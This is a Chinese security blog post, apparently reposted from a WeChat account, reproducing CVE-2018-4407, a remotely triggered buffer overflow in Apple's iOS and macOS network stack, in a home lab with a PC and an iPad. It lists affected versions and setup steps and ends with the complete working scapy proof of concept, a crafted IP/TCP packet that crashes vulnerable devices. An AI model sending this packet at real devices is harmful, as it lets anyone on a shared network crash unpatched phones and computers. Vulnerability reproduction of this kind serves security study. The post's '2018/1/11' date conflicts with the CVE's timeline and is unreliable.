CVE-2018-4407(IOS缓冲区溢出漏洞复现)

admin 2021年7月25日22:32:31评论232 views字数 578阅读1分55秒阅读模式

环境:用手机开启的热点,pc本一台,ipad一台

pc电脑:192.168.43.30

ipad:192.168.43.145

影响版本

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

如图,将pc跟ipad运行在同一个网下

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

安装scapy模块

pip install scapy

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

执行脚本程序

python cve-2018-4407.py

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

最后给大家一个ipad的测试截图

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

最后poc肯定是要发出来的呀~

#pip install scapy

import scapy

from scapy.all import *

 

send(IP(dst="192.168.43.145",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

如需转载,请注明原文出处!!!

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

2018/1/11  

ian

本文始发于微信公众号(零组攻防实验室):CVE-2018-4407(IOS缓冲区溢出漏洞复现)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日22:32:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2018-4407(IOS缓冲区溢出漏洞复现)https://cn-sec.com/archives/355977.html

发表评论

匿名网友 填写信息